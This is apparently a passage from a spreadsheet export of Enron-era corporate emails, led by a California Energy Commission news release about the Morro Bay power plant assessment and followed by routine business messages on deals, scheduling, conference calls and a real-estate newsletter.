NEWS RELEASE_x000D_
FROM THE_x000D_
CALIFORNIA ENERGY COMMISSION_x000D_
_x000D_
------------------------------------------------------------------------_x000D_
_x000D_
  _x000D_
For immediate release: December 19, 2001_x000D_
Contact: Mary Ann Costamagna - 916-654-4989_x000D_
_x000D_
_x000D_
Energy Commission Releases Second Part of_x000D_
Morro Bay Power Plant Staff Analysis _x000D_
Sacramento - The second part of the Final Staff Assessment of the Morro Bay Modernization and Replacement Project is now available from the California Energy Commission. Both parts one and two can be viewed on the Energy Commission's website at: _x000D_
_x000D_
www.energy.ca.gov/sitingcases/morrobay/ _x000D_
_x000D_
_x000D_
Part two of the Morro Bay project Final Staff Assessment contains the Commission staff evaluation of the potential impacts on land use, cultural, soil and water resources. The analysis, required by the California Environmental Quality Act, is based on input from the public, local, state and federal agencies. The Final Staff Assessment does not represent a decision or proposed decision on the project._x000D_
_x000D_
Like part one, part two of the Final Staff Assessment makes no recommendation on the proposed project. In late January, Commission staff will release part three of the Final Staff Assessment. Part three will analyze the proposal's impact on biological resources, cooling tower options and project alternatives once staff receives necessary information from various, federal, state and local agencies. It will also contain staff's recommendation on the project._x000D_
_x000D_
Duke Energy, LLC filed an Application for Certification for the Morro Bay Modernization and Replacement Project with the California Energy Commission on October 23, 2000. The proposal would replace the existing 1,030-megawatt Morro Bay Power Plant units 1, 2, 3 and 4 with two, state-of-the-art, gas-fired, 600-megawatt, combined-cycle units, generating a total of 1,200 megawatts. Each new unit will consist of two gas-fired turbines and one steam turbine with two 145-foot-tall stacks. The total of four new stacks would replace the existing power plant's three stacks that are 450 feet tall._x000D_
_x000D_
Hearings giving the public and interested parties a chance to comment on part two of the Staff Assessment will be announced in the next few weeks._x000D_
_x000D_
Public participation is an important part of the Energy Commission's power plant certification process. People may get involved in a variety of ways. To find out how, contact the Energy Commission's Public Adviser, Roberta Mendonca, at 916-654-4489, toll free at 800-822-6228 or by e-mail at: pao@energy.state.ca.us . _x000D_
_x000D_
_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * _x000D_
_x000D_
To unsubscribe from this list, please go to:_x000D_
_x000D_
http://www.energy.ca.gov/listservers/_x000D_
_x000D_
Or simply send an e-mail to majordomo@energy.ca.gov_x000D_
and in the body of the e-mail, type in_x000D_
_x000D_
unsubscribe (name of this list)_x000D_
_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
_x000D_
Farideh Namjou_x000D_
Web Development Team_x000D_
California Energy Commission_x000D_
916-654-4989_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 10:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Margaux Updated Closing Documents List</t>
  </si>
  <si>
    <t>Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 07/07/2000 05:50 PM -----_x000D_
_x000D_
	LKeene@milbank.com_x000D_
	07/07/2000 03:45 PM_x000D_
		 _x000D_
		 To: sdwyer@enron.com, mabboudy@enron.com, aedgley@enron.com, _x000D_
mevans@enron.com, plord@enron.com, baiken@enron.com, bglisan@enron.com, _x000D_
mike.jakubik@enron.com, jbadillo@enron.com, jginty@enron.com, _x000D_
donette.dewar@enron.com, alvaro.camarero@enron.com, sschard@enron.com, _x000D_
scott.sefton@enron.com, carol.st.clair@enron.com, nora.dobin@enron.com, _x000D_
Kathy.M.Lynn@enron.com, Brenda.L.Funk@enron.com, dscott@dlj.com, _x000D_
rcabes@dlj.com, dhemsey@dlj.com, jball@dlj.com, pwoodbur@dlj.com, _x000D_
rpiskadl@dlj.com, bherman@dlj.com, melissa.p.allen@arthurandersen.com, _x000D_
cclementdavies@velaw.com, jeldredge@velaw.com, smacgibbon@velaw.com, _x000D_
tchandler@velaw.com, acurry@velaw.com, mschimberg@velaw.com, _x000D_
mkidwell@velaw.com, awright@velaw.com, eosterberg@velaw.com, _x000D_
mrh@mm-brig.mottmac.com, jl1@mm-brig.mottmac.com, mhagopia@linklaters.com, _x000D_
opetrovi@linklaters.com, mark.cheney@linklaters.com, gmitchell@ustrust.com, _x000D_
lyoung@ustrust.com, sbaratta@sewkis.com_x000D_
		 cc: TSiebens@milbank.com, PFletcher@milbank.com, TDavis@milbank.com, _x000D_
BKayle@milbank.com, LKeene@milbank.com, FKneip@milbank.com, _x000D_
ERayner@milbank.com, MWilson2@milbank.com, AWalker@milbank.com, _x000D_
TWise@milbank.com, MBanks@milbank.com, DLamb@milbank.com, _x000D_
AWinston@milbank.com, FGodi@milbank.com, SFriedman@milbank.com, _x000D_
NdeSilva@milbank.com_x000D_
		 Subject: Margaux Updated Closing Documents List_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Attached, please find an updated version of the Project Margaux Closing _x000D_
Documents List.? Amendments to the document reflect comments received from _x000D_
various parties, including V&amp;E and Linklaters during a conference call this _x000D_
afternoon.? _x000D_
_x000D_
Kind Regards, _x000D_
Tom Siebens _x000D_
Lonnie Keene _x000D_
??????? ??????? ??????? ?  &lt;&lt;#20042441 v6 - PROJECT MARGAUX - CLOSING _x000D_
DOCUMENTS LIST.doc&gt;&gt; ?? _x000D_
_x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee _x000D_
or agent responsible for delivery of this message to the intended _x000D_
recipient(s), you are hereby notified that any dissemination, _x000D_
distribution or copying of this e-mail message is strictly prohibited. _x000D_
If you have received this message in error, please immediately notify _x000D_
the sender and delete this e-mail message from your computer. _x000D_
_x000D_
_x000D_
 - #20042441 v6 - PROJECT MARGAUX - CLOSING DOCUMENTS LIST.doc</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 01:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ATCO Power Canada Ltd. Master Enabling Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">John:  Per my voice mail.  Please call.  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 06/01/2000 08:05 AM -----_x000D_
_x000D_
	Duncan Croasdale_x000D_
	05/31/2000 06:11 PM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ATCO Power Canada Ltd. Master Enabling Agreement_x000D_
_x000D_
_x000D_
Sara,_x000D_
_x000D_
As discussed, ECC hopes to transact with ATCO over the next week or so if we _x000D_
can agree on pricing.  This is the form of agreement they propose.  It _x000D_
represents _x000D_
the way their 3-way JV owned plant will sell power offtake to marketers such _x000D_
as Enron.  I would be interested in your opinion especially if we are close _x000D_
to _x000D_
commercial agreement._x000D_
_x000D_
Please call me if you have any questions._x000D_
_x000D_
Regards,_x000D_
_x000D_
Duncan Croasdale_x000D_
tel. 403.974.6718_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 08:04:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.gruesen@enron.com'})</t>
  </si>
  <si>
    <t>Revised LIG invoice</t>
  </si>
  <si>
    <t>Gerald,_x000D_
_x000D_
I just received a copy of the revised LIG invoice from Bob Walker.  They are now billing Bridgeline for the amount owed.  I am concerned that Bob states in the letter that I provided Bridgeline's costs on their behalf.  _x000D_
_x000D_
Any thoughts as to what this might open up?_x000D_
Thanks,_x000D_
Karen</t>
  </si>
  <si>
    <t>Fri, 28 Sep 2001 13:55:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: fiber morphology study</t>
  </si>
  <si>
    <t>sounds great. Let's meet on Monday_x000D_
_x000D_
Monika_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allan, David  _x000D_
Sent:	Friday, September 28, 2001 3:54 PM_x000D_
To:	Causholli, Monika_x000D_
Cc:	Carter, Karen E._x000D_
Subject:	fiber morphology study_x000D_
_x000D_
Monika, I found the Jacobs-Sirrine proposal on the fiber study; you can get a copy from me._x000D_
_x000D_
They included a matrix on which they would display various fiber characteristics, which I'm attaching. &lt;&lt; File: Fiber Morphology.xls &gt;&gt;  Cecil and I went over it and he suggested some changed, which are incorporated here. The only one he wants to add that isn't reflected here---but which we need to tell them---is that we want to know why each quality parameter (the column headings) is important to each major end-use (paper grade) application._x000D_
_x000D_
Let's go over this Monday morning._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 10:31:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'reiscast__wave_two.um.a.1013.332@reis-reports.unitymail.net'})</t>
  </si>
  <si>
    <t>frozenset({'reiscast__wave_two@reis-reports.unitymail.net'})</t>
  </si>
  <si>
    <t>Metro Briefs</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]=20_x000D_
=09[IMAGE]=09[IMAGE]=09=09_x000D_
[IMAGE] =09[IMAGE] [IMAGE]=09   [IMAGE] [IMAGE]  [IMAGE] [IMAGE]  [IMAGE] [=_x000D_
IMAGE]  [IMAGE]  [IMAGE] [IMAGE][IMAGE] =09[IMAGE]=09_x000D_
_x000D_
[IMAGE]_x000D_
=09=09[IMAGE]=09=09=09_x000D_
=09=09[IMAGE]=09=09[IMAGE]=09_x000D_
 [IMAGE] [IMAGE] =09[IMAGE]=09[IMAGE] [IMAGE]    ReisCast November 20, 2001=_x000D_
  Reis - America's Source for Real Estate Investing    Welcome to ReisCast,=_x000D_
 our weekly email newsletter.  This week's edition highlights are:    Metro=_x000D_
 Briefs  Reis's 3Q01 Data       [IMAGE]   [IMAGE]    1. Metro Briefs  "Cowt=_x000D_
own" Still Herds'm In - Ft. Worth Office Market - Third Quarter 2001  Despi=_x000D_
te the deep sense of tradition and cowboy pride pervading Ft. Worth, over t=_x000D_
he past decade the city has managed to transcend its image as the most "Tex=_x000D_
an" city in Texas--home of the ten-gallon hat, ho-down, and "longhorn" roun=_x000D_
dup--and establish itself as an economic powerhouse.  Today's pioneers head=_x000D_
 to the area's Alliance Airport Corridor, which has proven to be the vangua=_x000D_
rd of the local economy's revolutionary modernization, a transformation des=_x000D_
ired, though not often attained, by other post-industrial areas...    To ge=_x000D_
t the entire market excerpt as well as an opportunity to buy the full Reis =_x000D_
Observer report, go to: www.reis.com/learning/insights_metro_spotlight1.cfm=_x000D_
        Looking for a Silver Lining   - Northern Virginia Industrial Market=_x000D_
- Third Quarter 2001       Ranked the third-largest high-tech center in the=_x000D_
 nation after California's Silicon Alley and Boston's Route 128 Corridor, i=_x000D_
t is little wonder that the industrial real estate market in Northern Virgi=_x000D_
nia has been hard hit by the high-tech bust and current economic downturn. =_x000D_
 Moreover, shaken by the recent nearby attack on the Pentagon, the Northern=_x000D_
 Virginia region has been scrambling to cope with the recent turn of events=_x000D_
...But the outlook may not be entirely grim...       To get the entire mark=_x000D_
et excerpt as well as an opportunity to buy the full Reis Observer report, =_x000D_
go to:  www.reis.com/learning/insights_metro_spotlight1.cfm#two       [IMAG=_x000D_
E]      2. Reis's 3Q01 Data  According to Reis, overall office vacancies ar=_x000D_
e up a sizable 130 basis points from the second quarter 2001, to 11.4%, whi=_x000D_
le apartment vacancies are up just 20 basis points to 3.4%--trends reflecte=_x000D_
d by third quarter results from NCREIF (the National Council of Real Estate=_x000D_
 Investment Fiduciaries, Chicago, IL.), an industry benchmark for real esta=_x000D_
te performance.  According to this source, the Apartment sector had the hig=_x000D_
hest quarterly return of 2.05% (comprised of income and appreciation), foll=_x000D_
owed by the Industrial (1.96%), Office (1.53%) and Retail (1.27%) sectors. =_x000D_
  To find out more about real estate metros across the country, get Reis's =_x000D_
MetroTrend, SubTrend, and CompQuote reports, all updated with the latest 3Q=_x000D_
 2001 data.    From Wall Street to Main Street, our clients rely on Reis fo=_x000D_
r comprehensive, proven transaction support.    As always, we welcome your =_x000D_
comments and suggestions.   www.reis.com      [IMAGE]  You are receiving th=_x000D_
e email because you have subscribed to this list.  If you would like to rem=_x000D_
ove yourself from this list, please click here  and you will be removed imm=_x000D_
ediately! Thank you!  [IMAGE]   [IMAGE]  [IMAGE]  [IMAGE] [IMAGE]    ?2001 =_x000D_
Reis, Inc. All rights reserved.   =09[IMAGE]=09[IMAGE] [IMAGE] [IMAGE] =09_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 14:35:47 -0800 (PST)</t>
  </si>
  <si>
    <t>conference room number</t>
  </si>
  <si>
    <t>the phone number for the conference room in calgary is 403-974-6983</t>
  </si>
  <si>
    <t>Tue, 4 Apr 2000 00:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Employee memo</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen--here is the revised draft of the all-employee memo that we could _x000D_
send from the Office of the Chairman.  Since Diomedes and David aren't _x000D_
pushing this, I'd rather just keep it in reserve right now rather than keep _x000D_
it moving.  (I am not sending this latest version to them.)  Mark, for your _x000D_
info I am including the version that Diomedes and I have tentatively agreed _x000D_
on that he would send to his region as well._x000D_
_x000D_
I am getting mixed signals on NoCal.  Michael Miller says he is still working _x000D_
on their IM, yet today Frank Stabler said that he doesn't want the news clips _x000D_
any more due to their "change in status".  What does this mean?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 09:01:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Translink</t>
  </si>
  <si>
    <t>thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Migden, Janine  _x000D_
Sent:	Thursday, October 11, 2001 10:54 AM_x000D_
To:	Steffes, James D._x000D_
Subject:	RE: Translink_x000D_
_x000D_
Talked with Kerry.  He is ready to go at it!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 08, 2001 10:26 AM_x000D_
To:	Migden, Janine_x000D_
Subject:	RE: Translink_x000D_
_x000D_
Janine --_x000D_
_x000D_
I have not yet talked to Kerry about this but the Translink is moving forward.  Will you do it today?_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Migden, Janine  _x000D_
Sent:	Monday, October 01, 2001 9:01 AM_x000D_
To:	Nicolay, Christi L.; Steffes, James D._x000D_
Subject:	RE: Translink_x000D_
_x000D_
I think he would do a good job.  _x000D_
Jim, Do you want to talk to him about it?_x000D_
Janine_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nicolay, Christi L.  _x000D_
Sent:	Monday, October 01, 2001 8:41 AM_x000D_
To:	Steffes, James D.; Migden, Janine_x000D_
Subject:	RE: Translink_x000D_
_x000D_
I agree._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Monday, October 01, 2001 7:40 AM_x000D_
To:	Nicolay, Christi L.; Migden, Janine_x000D_
Subject:	FW: Translink_x000D_
_x000D_
_x000D_
What do you think that about having Kerry take the lead on all MAPP area RTOs while also supporting Roan in MISO/ARTO?  Not top priority but I think this could be a good opportunity._x000D_
_x000D_
Jim_x000D_
 -----Original Message-----_x000D_
From: 	Landwehr, Susan M.  _x000D_
Sent:	Sunday, September 30, 2001 10:05 PM_x000D_
To:	Nicolay, Christi L.; Novosel, Sarah_x000D_
Cc:	Migden, Janine; Hueter, Barbara A.; Steffes, James D.; Roan, Michael; Stroup, Kerry_x000D_
Subject:	Translink_x000D_
_x000D_
_x000D_
Christi/Sarah--you guys are probably aware of this, but just in case you aren't, there was an article in the Minneapolis paper yesterday that Xcel (NSP) had filed on Friday with FERC to transfer it's transmission system to a new company called TransLink Transmission Co.  Joining them are Alliant, Corn Belt Coop (Iowa), Mid AMerican, NPPD, and OPPD.  _x000D_
_x000D_
I noted that there was a quote in the article that "Xcel estimates that it would cut its overal transmission related fees by more than a thrid through it's participation in Translink.......because there will be less overlap of functions."</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 12:45:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'md@sdabocconi.it'})</t>
  </si>
  <si>
    <t>application and brochures</t>
  </si>
  <si>
    <t>Can I get an application and a brochure from the Bocconi university. I am interested in the MIEM/MCF._x000D_
_x000D_
My name:_x000D_
Monika Causholli_x000D_
_x000D_
Address:_x000D_
_x000D_
2440 north boulevard # 5205_x000D_
Houston, TX 77098_x000D_
USA_x000D_
Tel 713 807 1039_x000D_
email: mcausholli@hotmail.com_x000D_
_x000D_
thank you,_x000D_
Monika Causholli</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 05:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: vacation</t>
  </si>
  <si>
    <t xml:space="preserve">I have family coming sometime in the middle of June as well as the end of _x000D_
July.  I do not know the exact dates yet but I will try and coordinate with _x000D_
everyone on what days I take off so as to maximize lawyer coverage during _x000D_
Sara's scheduled vacation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Sara Shackleton@ECT_x000D_
	05/17/2001 11:05 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Brent _x000D_
Hendry/NA/Enron@Enron, Carol St Clair/HOU/ECT@ECT, Susan Bailey/HOU/ECT@ECT, _x000D_
Tana Jones/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Stephanie _x000D_
Panus/NA/Enron@Enron, Cheryl Nelson/NA/Enron@Enron, Mark _x000D_
Greenberg/NA/Enron@ENRON, Frank Sayre/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Francisco Pinto Leite/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Anne C _x000D_
Koehler/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: vacation_x000D_
_x000D_
I will be on vacation from June 14 - 22.  I do not see any conflicts on the _x000D_
calendar._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 08:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RAC Meeting for May 25th, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Rick:_x000D_
Eight new projects--of which some are significant in size-- have been added _x000D_
to the list of the hot deals for May 25th, 2001.  They--and their suggested _x000D_
action items--are as follows:_x000D_
_x000D_
 Project  Originator  Description     _x000D_
EBS:_x000D_
 Advertising JV  Erik Simpson  EBS to provide risk management to media _x000D_
buyer   ($28 million)_x000D_
 Raven   Jeff Donahue  Purchase assets of managed hosting company ($400 _x000D_
million)_x000D_
 Samsung DRAM Ken Wang  1 month financing of DRAM Inventory (5 million)_x000D_
_x000D_
Suggested Action Item:  Communicate findings to Sue Nord and compile GA _x000D_
comments for RAC, if any.  Lisa Yoho is also informed given the very _x000D_
interesting structure of Samsung DRAM deal that is likely to be repeated with _x000D_
other seriously backwardated commodities.  _x000D_
EWS/EGM_x000D_
 Weirton   Tammy Mulroony  Rolled Steal forward purchase ($ 75 million)_x000D_
 Timber      Sale of 100 MM asset at cost  ($100 million)_x000D_
 DPR accelerated put Mike Beyer  Exercise Put and reinvest in coal related _x000D_
assets  ($11 million) _x000D_
Suggest Action Item:  Communicate findings to J. Steffes, and Lisa Yoho and _x000D_
compile GA comments for RAC, if any._x000D_
_x000D_
Finally, I am taking the liberty to contact Paul Kaufman to inform him of _x000D_
project PortMorrow which is the developing of 47 MW peaking facility in _x000D_
Oregon for PGE (originator Chuck Randall).  I shall follow up with him in _x000D_
case that there are any needed action item.  _x000D_
_x000D_
Of course, please let me know if you have any question._x000D_
_x000D_
Brgrds_x000D_
_x000D_
AI  </t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 01:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sohonm@tdusa.com'})</t>
  </si>
  <si>
    <t>Numbers for Enron Call today at 11:30 EST, 10:30 Houston Time</t>
  </si>
  <si>
    <t xml:space="preserve">Time: 11:30 EST_x000D_
_x000D_
Please use the following numbers:_x000D_
US Dial-in_x000D_
(800) 331-7048_x000D_
International Dial-in_x000D_
(865) 523-6997_x000D_
_x000D_
Passcode: 415452_x000D_
_x000D_
_x000D_
- Mitali_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 01:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gary.hanks@enron.com', 'daren.farmer@enron.com', 'pat.clynes@enron.com'})</t>
  </si>
  <si>
    <t>Suemar Berryman; Gulf Plains Plant for Current Month</t>
  </si>
  <si>
    <t>Daren,_x000D_
_x000D_
As you know, we have experienced some fluctuations at the Berryman well for _x000D_
OCT, which in turn affects our volumes at the Gulf Plains Plant.  From a _x000D_
physical standpoint, I think that we are fairly well balanced.  My concern is _x000D_
that we are "overproduced" on paper by 76,162 Dth/Mo.   I think that we need _x000D_
to bring the nominations up to balance in Sitara at the Berryman well and, a _x000D_
corresponding volume at Meters 708 and 6363, with an offset on Strangers to _x000D_
keep the physical side in line.  If my understanding is correct (and if not, _x000D_
please correct me) this should have a positive impact on our current month _x000D_
UA4._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Mary</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 07:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jay.webb@enron.com', 'bob.shults@enron.com', 'donald.cornwell@enron.com', 'claudia.clark@enron.com', 'frank.davis@enron.com', 'jarod.jenson@enron.com', 'michael.danielson@enron.com', 'leonardo.pacheco@enron.com', 'tara.sweitzer@enron.com', 'cecilia.olvera@enron.com', 'lisa.lees@enron.com', 'dale.neuner@enron.com', 'beth.perlman@enron.com', 'dave.samuels@enron.com', 'mark.dilworth@enron.com', 'kal.shah@enron.com', 'lorraine.becker@enron.com', 'dforster@enron.com', 'mike.self@enron.com', 'mark.taylor@enron.com', 'melba.lozano@enron.com', 'daniel.diamond@enron.com', 'andy.zipper@enron.com', 'harry.bucalo@enron.com', 'matt.motsinger@enron.com', 'cherylene.westbrook@enron.com', 'liz.taylor@enron.com', 'jennifer.denny@enron.com', 'torrey.moorer@enron.com', 'john.pavetto@enron.com', 'mario.cardoso@enron.com', 'peggy.mccurley@enron.com', 'sheri.thomas@enron.com', 'mary.weatherstone@enron.com', 'philippe.bibi@enron.com', 'julie.ferrara@enron.com', 'greg.whalley@enron.com', 'lisa.gillette@enron.com', 'sheila.graves@enron.com'})</t>
  </si>
  <si>
    <t>Happy B- Day - Louise</t>
  </si>
  <si>
    <t>COME BY AND WISH _x000D_
_x000D_
LOUISE KITCHEN _x000D_
A_x000D_
HAPPY BIRTHDAY_x000D_
_x000D_
WHEN:  TUESDAY, MAY 9TH, 2000_x000D_
TIME:    9:00 AM - 10:00 AM _x000D_
DATE:   CONFERENCE ROOM EB2645_x000D_
_x000D_
SEE YOU THERE_x000D_
_x000D_
If you have any questions, please me at extension 3-9975._x000D_
_x000D_
Lydia</t>
  </si>
  <si>
    <t>John Buchanan - Oncall</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	John Buchanan - Oncall_x000D_
_x000D_
Date:		7/15/2001_x000D_
Time:		7:00 AM - 7:55 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Mon, 16 Jul 2001 09:23:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'judy.thorne@enron.com'})</t>
  </si>
  <si>
    <t>RE: Pioneer Confirm</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nemec, Gerald  _x000D_
Sent:	Monday, July 16, 2001 10:52 AM_x000D_
To:	Thorne, Judy_x000D_
Subject:	Pioneer Confirm_x000D_
_x000D_
Judy,  Attached is the Pioneer Confirm.  Please insert all the relevant contact information.  Also please carefully review the confirm to make sure that I interpreted your email info. correctly.  I left a blank for the Field information.  I would ask the counterparty to fill in and return a copy to ENA Upstream._x000D_
_x000D_
 &lt;&lt; File: Pioneerconfirm.doc &gt;&gt; _x000D_
_x000D_
 &lt;&lt; File: enaupstreamGTC.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 10:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SWPC Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Kay -_x000D_
_x000D_
I've reached a verbal agreement with Westinghouse on the LD issues.  I've _x000D_
attached a letter outlining the agreement.  Could you review from a legal _x000D_
standpoint?  Call me with questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Mitch_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 00:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Initial Thoughts On Alberta</t>
  </si>
  <si>
    <t>Looks great.  I think we should have a least 1 or 2 real time traders in _x000D_
Calgary.</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Strategic Risk Management</t>
  </si>
  <si>
    <t xml:space="preserve">Mark_x000D_
_x000D_
Thanks for your response on this. I thought that in principle many of the _x000D_
hedges we used would be harmless, however, I would feel more comfortable with _x000D_
a more detailed review with you, particularly since one of the hedging _x000D_
transaction types involves the use of Enron stock._x000D_
_x000D_
Let me know when would be a convenient time to brief you._x000D_
_x000D_
Regards_x000D_
David_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 01:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fuel Cell - conference call (time change)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 10/31/2000 09:17 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Claudette Harvey@ECT_x000D_
10/31/2000 09:17 AM_x000D_
To: Heather Kroll/HOU/ECT@ECT, Jeffery Ader/HOU/ECT@ECT, Ozzie _x000D_
Pagan/HOU/ECT@ECT, Stephen Plauche/Corp/Enron@Enron, Kay Mann/Corp/Enron@Enron_x000D_
cc: Scott Healy/HOU/ECT@ECT _x000D_
_x000D_
Subject: Fuel Cell - conference call (time change)_x000D_
_x000D_
The following time for a conference call to discuss outstanding issues, _x000D_
purchase document, latest draft...etc. w/Fuel Cell will be held today, _x000D_
Tuesday, October 31:_x000D_
_x000D_
  Time:  12:00 pm - 4:00 pm (central time)_x000D_
_x000D_
  Location:  EB-2938_x000D_
_x000D_
  Topic:  Fuel Cell - conference call/discussions_x000D_
_x000D_
call me if you need anything else._x000D_
_x000D_
_x000D_
claude_x000D_
3-0497_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 11:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Off the Wall?</t>
  </si>
  <si>
    <t xml:space="preserve">Kathryn Corbally (Senior Director currently in Investor Relations) is moving _x000D_
to Connecticut soon to join her husband.  He has been working up there for _x000D_
the last six or eight months - he was one of the group that defected from our _x000D_
weather derivatives team about a year ago.  She hopes to continue to work for _x000D_
Enron - has been talking with Investor Relations and some other groups that I _x000D_
can't remember - and to do so either out of her home or in Enron's New York _x000D_
office.  _x000D_
_x000D_
It struck me that depending upon needs at MG's New York office, that Kathryn _x000D_
could be someone for you to consider.   She came originally from the London _x000D_
office - you may or may not find anyone still there that could give you some _x000D_
feedback on her.  In London, she ran mid and back office - that was in very _x000D_
early days for EEL, so most of the job was probably accounting.  She came to _x000D_
Houston and  has done a number of different things.  I think that she is well _x000D_
organized and control minded.  Understands Enron's business.  Managing a _x000D_
group of people is probably not her strongest attribute.  I am not sure that _x000D_
people enjoy working under her.  That could be old news, however.  There are _x000D_
a number of people here in Houston that could probably give you a read on her _x000D_
based on very recent experience.  Do you know of her?  _x000D_
_x000D_
Just thought that I would mention her as a potential resource in New York.  _x000D_
Don't know what your short and longer term needs are there.  She would _x000D_
definitely represent an Enron point of view.  They have two small daughters - _x000D_
she might be interested in something part time even.  Could mean lower cost _x000D_
that way.  _x000D_
_x000D_
This idea may not have any merit or you may not have a need around metals.  _x000D_
If you do want to consider this, I will be glad to help identify who you _x000D_
could go to for some fact finding around her.  Let me know.  --Sally   </t>
  </si>
  <si>
    <t>Mon, 8 May 2000 11:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeremy.blachman@enron.com', 'marty.sunde@enron.com', 'kevin.hughes@enron.com', 'harry.kingerski@enron.com', 'john.neslage@enron.com', 'james.lewis@enron.com', 'scott.stoness@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Next Steps</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find the memo I promised related to next steps.  Let me know._x000D_
_x000D_
JDS_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 03:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Baret Alize-Euro Fund</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find Deemed ISDA._x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 05:08:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jaime.gualy@enron.com'})</t>
  </si>
  <si>
    <t>FW: Power Fin Swaption description</t>
  </si>
  <si>
    <t xml:space="preserve">Harry,_x000D_
 _x000D_
Welcome back.  Here is were we stand with the options on financial swaps.  We should be getting more information later this week._x000D_
 _x000D_
Jaime_x000D_
-----Original Message-----_x000D_
From: Meredith, Kevin _x000D_
Sent: Wednesday, November 21, 2001 7:21 AM_x000D_
